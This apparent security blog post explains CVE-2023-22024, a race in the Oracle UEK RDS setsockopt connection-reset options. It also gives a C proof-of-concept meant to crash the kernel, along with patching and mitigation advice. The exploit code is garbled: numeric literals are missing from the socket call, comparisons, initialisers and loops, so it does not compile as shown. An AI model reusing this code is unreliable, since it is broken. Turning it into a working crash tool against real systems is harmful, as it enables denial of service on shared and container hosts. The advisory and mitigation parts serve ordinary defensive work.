CVE-2023-22024 is a moderate-security vulnerability affecting Oracle's Unbreakable Enterprise Kernel (UEK). This flaw impacts the RDS (Reliable Datagram Sockets) module, which provides a fast and reliable datagram transport protocol for high-performance clustering and messaging.
Specifically, the setsockopt(2) system call exposes two options, RDS_CONN_RESET and RDS6_CONN_RESET, that are not re-entrant. This means a system call can interfere with itself if issued in parallel, leading to race conditions and instability. A local user with the CAP_NET_ADMIN capability (common on container hosts or with local sudo privileges) could exploit this to crash the kernel—triggering a Denial of Service (DoS).
This bug only affects availability and is scored at 5.5 (medium) on the CVSS 3.1 scale.
- CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)
- Original Advisory: Oracle CVE-2023-22024 Detail
Understanding the Bug
In UEK’s RDS module, the implementation of setsockopt() handlers for resetting RDS connections (RDS_CONN_RESET, RDS6_CONN_RESET) does not properly protect against simultaneous invocations (they are "not re-entrant").
Without locking or another concurrency guard, multiple threads rapidly invoking these options can step over each other's data, potentially leading to a kernel panic (crash) or memory corruption.
Who can exploit?
- *Only users with the CAP_NET_ADMIN capability can trigger this.* Default root users or privileged containers are most at risk.
Sample Exploit Code
Below is a simplified example (for educational purposes only!) that demonstrates how a local user could crash the kernel using this bug. Never run this on a production system.
/**
* CVE-2023-22024 POC
* Trigger kernel crash via non-reentrant RDS_*_CONN_RESET setsockopt
* Compile with: gcc -o cve2023-22024 cve2023-22024.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/rds.h>
#include <pthread.h>
#define THREADS 16 // spawn several threads for maximum race
#define TIMES 100
void *reset_thread(void *arg) {
int sock = socket(AF_RDS, SOCK_STREAM, );
if (sock < ) {
perror("socket");
pthread_exit(NULL);
}
int val = ;
for(int i=; i<TIMES; ++i) {
// Alternate between RDS_CONN_RESET and RDS6_CONN_RESET
setsockopt(sock, SOL_RDS, RDS_CONN_RESET, &val, sizeof(val));
setsockopt(sock, SOL_RDS, RDS6_CONN_RESET, &val, sizeof(val));
}
close(sock);
return NULL;
}
int main() {
pthread_t th[THREADS];
for (int i=; i<THREADS; ++i) {
pthread_create(&th[i], NULL, reset_thread, NULL);
}
for (int i=; i<THREADS; ++i) {
pthread_join(th[i], NULL);
}
puts("Done!");
return ;
}
Important: To compile and run this code, you must have root or CAP_NET_ADMIN privileges, as well as the RDS kernel module loaded.
How Can You Protect Your System?
- Patch immediately: Oracle has released a kernel patch. See Oracle July 2023 CPU Advisory.
Restrict local privileges: Only grant CAP_NET_ADMIN to trusted users or containers.
- Disable RDS module: If you don't use RDS, blacklist it to prevent loading (add blacklist rds to /etc/modprobe.d/blacklist.conf and reboot).
Additional References
- Oracle Security Alert (July 2023)
- NVD CVE Entry
- setsockopt(2) man page
- About RDS Protocol (Oracle Docs)
Summary
CVE-2023-22024 shows how a relatively obscure kernel protocol—RDS—can become a risk when strict concurrency controls aren't enforced. If you run Oracle Linux or any distribution using UEK and rely on RDS, patching is urgent. Never grant CAP_NET_ADMIN to untrusted users, especially in containerized environments.
Stay proactive. Apply updates. Limit privilege where possible.
If your system needs to be always up, don't ignore medium-severity kernel bugs—availability can mean everything.
*(Post exclusive for this platform. No official code of exploit is provided by Oracle. Use responsibly.)*
Timeline
Published on: 09/20/2023 21:15:00 UTC
Last modified on: 09/25/2023 16:09:00 UTC